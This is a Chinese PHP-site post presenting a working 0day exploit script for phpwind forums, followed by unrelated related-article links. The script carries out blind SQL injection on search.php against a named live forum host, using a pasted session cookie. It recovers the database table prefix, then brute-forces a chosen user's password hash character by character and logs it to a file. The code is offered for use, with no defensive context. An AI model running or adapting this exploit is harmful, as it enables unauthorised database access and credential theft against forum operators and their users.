从网上搜到的phpwind 0day的代码


Posted in PHP onDecember 07, 2006

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>Codz By 剑心</title>
<style type="text/css">
body,td {
font-family: "Tahoma";
font-size: "12px";
line-height: "150%";
}
.smlfont {
font-family: "Tahoma";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {
COLOR: "#A60000";
}
a:link,a:visited,a:active {
color: "#000000";
text-decoration: underline;
}
a:hover {
color: "#465584";
text-decoration: none;
}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
<center>The Exploiet Of The All Phpwind Version</center>
<center> BY 剑心</center>
<br>
<br>
<br>
<br>
<br>

<?php
ini_set("max_execution_time",0);
error_reporting(7);

$path="/search.php";
$server='bbs.ccidnet.com';
$cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D';

$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)";

$uid=2;
$_GET['uid']&&$uid=$_GET['uid'];
$tid=539264;

$mask='没有查找匹配的内容';
$count=0;

//$testing=1;
//$testing=$_GET['test'];
if($testing) {preg_match('/X-Powered-By: php\/(.+)\r\n/ie',send(""),$php);echo$php[1];die();}

//$debug=1;

$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";
$response=send($cmd);

preg_match('/FROM (.+)threads/ie',$response,$match);

$pre=$match[1];
if ($match[1]) echo 'Good Job!Wo Got The pre: <font color=red>'.$match[1]."</font><br>";
else if (strpos($response,'value="登 录"')) die("You Are Not Login!Try to get anthor Cookie and Useragen value!<br>");
else {echo "Maybe It is not vul!<br>";die();}

echo "Try to Get the uid=$uid 's Password:<font color=red>";
$log=fopen('log.txt','a+');

for($i=0;$i<16;$i++)
{

$type=0;
$sub=$i+9;
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=0;
for($m=48;$m<=57;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";
$sql=urlencode($sql);
$temp=md5(rand(1,10000)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=1;
for($m=97;$m<=122;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {
echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

echo "error!<br>";
die("Shit!May be the data you post is Not valid!Try anthor UID\r\n");

}
fclose($log);
echo "<br>Done!We Post $count times!<br>";

function send($cmd)
{
global $path,$server,$cookie,$count,$useragent,$debug;

$count=$count+1;
$message = "POST ".$path."? HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Referer: http://".$server.$path."\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";

$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
if($debug) {echo $cmd;echo $resp;}
return $resp;
}
?>

PHP 相关文章推荐
PHP 数组入门教程小结
May 20 PHP
PHP CURL模拟GET及POST函数代码
Apr 25 PHP
PHP 魔术函数使用说明
May 14 PHP
PHP数组交集的优化代码分析
Mar 06 PHP
PHP中for与foreach的区别分析
Mar 09 PHP
PHP数据类型之整数类型、浮点数的介绍
Apr 28 PHP
学习php设计模式 php实现建造者模式
Dec 07 PHP
PHP6新特性分析
Mar 03 PHP
[原创]解决wincache不支持64位PHP5.5/5.6的问题(提供64位wincache下载)
Jun 22 PHP
thinkPHP5.0框架命名空间详解
Mar 18 PHP
PHP实现通过CURL上传文件功能示例
May 30 PHP
解决thinkphp6(tp6)在状态码500下不报错,或者显示错误“Malformed UTF-8 characters”的问题
Apr 01 PHP
ajax缓存问题解决途径
Dec 06 #PHP
数字转英文
Dec 06 #PHP
?生?D片??C字串
Dec 06 #PHP
?算你??的 PHP 程式大小
Dec 06 #PHP
PHP中,文件上传
Dec 06 #PHP
eWebEditor v3.8 商业完整版 (PHP)
Dec 06 #PHP
实现 win2003 下 mysql 数据库每天自动备份
Dec 06 #PHP
You might like
Php做的端口嗅探器--可以指定网站和端口
2006/10/09 PHP
PHP 函数call_user_func和call_user_func_array用法详解
2014/03/02 PHP
支持中文的PHP按字符串长度分割成数组代码
2015/05/17 PHP
PHP自定义函数获取URL中一级域名的方法
2016/08/23 PHP
PHP多维数组指定多字段排序的示例代码
2018/05/16 PHP
laravel 使用auth编写登录的方法
2019/09/30 PHP
jQuery get和post 方法传值注意事项
2009/11/03 Javascript
javascript对象之内置对象Math使用方法
2010/04/16 Javascript
defer属性导致引用JQuery的页面报“浏览器无法打开网站xxx,操作被中止”错误的解决方法
2010/04/27 Javascript
jQuery之选项卡的简单实现
2014/02/28 Javascript
兼容所有浏览器的js复制插件Zero使用介绍
2014/03/19 Javascript
JavaScript使用cookie实现记住账号密码功能
2015/04/27 Javascript
分享12个非常实用的JavaScript小技巧
2016/05/11 Javascript
jquery 获取select数组与name数组长度的实现代码
2016/06/20 Javascript
详解JS中定时器setInterval和setTImeout的this指向问题
2017/01/06 Javascript
node.js+express+mySQL+ejs+bootstrop实现网站登录注册功能
2018/01/12 Javascript
Vue表情输入组件 微信face表情组件
2019/02/11 Javascript
解决vue cli使用typescript后打包巨慢的问题
2019/09/30 Javascript
vue3.0实现插件封装
2020/12/14 Vue.js
python实现的jpg格式图片修复代码
2015/04/21 Python
Python实现购物车功能的方法分析
2017/11/10 Python
使用pandas对矢量化数据进行替换处理的方法
2018/04/11 Python
浅谈dataframe中更改列属性的方法
2018/07/10 Python
Python检测数据类型的方法总结
2019/05/20 Python
django rest framework serializer返回时间自动格式化方法
2020/03/31 Python
一文弄懂Pytorch的DataLoader, DataSet, Sampler之间的关系
2020/07/03 Python
CSS3中的display:grid,网格布局介绍
2019/10/30 HTML / CSS
使用html2canvas将页面转成图并使用用canvas2image下载
2019/04/04 HTML / CSS
详解canvas多边形(蜘蛛图)的画法示例
2018/01/29 HTML / CSS
编程用JAVA解析XML的方式
2013/07/07 面试题
外语专业毕业生自我评价分享
2013/10/05 职场文书
入党积极分子党支部意见
2015/06/02 职场文书
2016大学优秀学生干部事迹材料
2016/03/01 职场文书
大学生如何逃脱“毕业季创业队即散伙”魔咒?
2019/08/19 职场文书
一文彻底理解js原生语法prototype,__proto__和constructor
2021/10/24 Javascript
MySQL普通表如何转换成分区表
2022/05/30 MySQL